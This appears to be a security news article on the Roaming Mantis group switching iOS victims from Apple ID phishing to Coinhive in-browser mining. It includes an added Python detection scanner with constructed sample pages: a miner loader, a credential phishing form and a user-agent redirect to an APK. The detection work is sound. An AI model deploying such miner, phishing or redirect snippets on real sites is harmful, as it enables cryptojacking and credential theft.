New Kaspersky research indicates that the increasingly active Roaming Mantis Group is testing a new monetization technique that involves redirecting iOS users to Coinhive in-browser mining pages. Prior activities of this hacking group included the exploitation of vulnerable routers and changing their DNS configuration.
This allowed the attackers to redirect router traffic to malicious Android applications masquerading as Facebook or Chrome, or in the case of Apple devices – to phishing pages deployed to harvest Apple ID credentials.
The Roaming Mantis Group with New Hacking Approaches
In its newest campaigns, the attackers seem to be redirecting iOS users to pages that are laden with the Coinhive in-browser mining script, instead of redirecting them to the regular Apple phishing page. Once redirected, users are shown a blank page, with their CPU jumping up to 90% or even higher.
“During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly,” Kaspersky researchers said. Apparently, malware produced by the Roaming Mantis Group now supports 27 languages, covering countries across Asia, Europe and the Middle East. The latest updates in terms of malicious activities include web crypto-mining for PC, and Apple phishing pages for iOS devices.
“We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on,” Kaspersky added.
The hacking group previously targeted iOS devices via an Apple phishing page designed to harvest credentials. However, now the HTML source code of the malicious landing page appears to have been changed.
Apparently, the hackers disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for computers) to run mining on iOS devices, the researchers explained.
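The two landing-page variants described above (an Apple ID phishing form versus a blank page that loads an in-browser miner) and the user-agent branching that sends Android and iOS visitors to different payloads can be told apart from captured HTML alone. The following scanner is an added example written for this article, not code from Kaspersky or from the campaign; the Coinhive loader URL and constructor name are the publicly documented ones for that service, while the other patterns and all three sample pages are constructed for illustration.

```python
"""Classify a captured landing page by the indicators the Roaming Mantis
reporting describes: in-browser miner, Apple ID phishing form, or a
user-agent redirect that hands Android visitors an APK.
Patterns (other than the Coinhive loader/constructor) and the sample
pages are constructed for this example."""
import re

# Indicator regexes. Coinhive's loader URL and CoinHive.Anonymous()/User()
# constructor are as the service publicly documented them in 2018; the
# remaining patterns are assumptions about how such pages commonly look.
INDICATORS = {
    "miner_loader": re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I),
    "miner_ctor": re.compile(r"CoinHive\.(?:Anonymous|User)\s*\(", re.I),
    # user-agent string checked near an iOS/Android keyword (either order)
    "ua_branch": re.compile(
        r"(?:iPhone|iPad|Android)[\s\S]{0,120}navigator\.userAgent"
        r"|navigator\.userAgent[\s\S]{0,120}(?:iPhone|iPad|Android)", re.I),
    "apple_id_input": re.compile(r"<input[^>]+name=[\"']?apple[-_ ]?id", re.I),
    "password_input": re.compile(r"type=[\"']password[\"']", re.I),
    "apk_download": re.compile(r"href\s*=\s*[\"'][^\"']+\.apk[\"']", re.I),
}


def scan_landing_page(html: str) -> dict:
    """Return the indicators that fire and a coarse verdict for one page."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    if hits["miner_loader"] or hits["miner_ctor"]:
        verdict = "in-browser-miner"          # the blank page that pins the CPU
    elif hits["apple_id_input"] and hits["password_input"]:
        verdict = "apple-id-phishing"         # the earlier credential-harvest page
    elif hits["apk_download"]:
        verdict = "android-apk-lure"          # fake Facebook/Chrome APK hand-off
    else:
        verdict = "clean"
    return {"verdict": verdict,
            "indicators": sorted(n for n, fired in hits.items() if fired)}


# --- constructed sample pages (not captured from the campaign) -------------
MINING_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE-KEY-PLACEHOLDER');
  miner.start();
</script>
</head><body></body></html>"""

PHISH_PAGE = """<html><body>
<form method="post" action="/verify">
  <input name="apple_id" placeholder="Apple ID">
  <input name="pw" type="password">
</form>
</body></html>"""

REDIRECT_PAGE = """<script>
  var ua = navigator.userAgent;
  if (/iPhone|iPad/i.test(ua)) { location.href = "/ios.html"; }
  else if (/Android/i.test(ua)) { location.href = "/facebook.apk"; }
</script>"""

if __name__ == "__main__":
    for label, page in (("mining", MINING_PAGE), ("phish", PHISH_PAGE),
                        ("redirect", REDIRECT_PAGE)):
        print(label, scan_landing_page(page))
```

The verdict order matters: a miner indicator wins even if a page also carries a form, because the article's point is that the phishing redirect was disabled in favour of the mining script, and a miner hit is the higher-confidence signal of that variant. Run over a directory of captured pages, the indicator list rather than the verdict is what a responder would pivot on.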
Interestingly, the day after Kaspersky confirmed their findings, the hackers switched back to Apple phishing again. “We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities,” Kaspersky concluded.